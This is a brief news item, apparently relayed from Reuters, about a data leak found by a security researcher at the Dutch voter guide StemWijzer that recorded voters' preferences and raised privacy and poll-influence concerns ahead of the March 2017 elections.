A data leak from StemWijzer, a Dutch voter guide website, has raised questions about its intentions and whether it is quietly conducting popularity polls and infringing upon voters’ privacy, Reuters reports. Security researcher Loran Kloeze discovered that a record of voters’ preference was being maintained by the site, which could potentially influence trends ahead of the March 15 elections in the Netherlands.

Anita de Jong of website designer ProDemos said vulnerabilities pointed out by Kloeze had been resolved and clarified the intention was not to offer voting advice but only to educate voters.

StemWijzer asks a site visitor 30 questions and then tells them which political party best matches their views. The leaked data currently places the Labour Party second, behind the Party for Freedom, even though opinion polls do not reflect this.

Countries going to the polls this year are working overtime to address cybersecurity concerns, following multiple hacking incidents during the US presidential election last year.

For the full story, read Reuters.


Article source: http://www.darkreading.com/attacks-breaches/dutch-voter-guide-website-leak-highlights-privacy-concerns/d/d-id/1328080?_mc=RSS_DR_EDT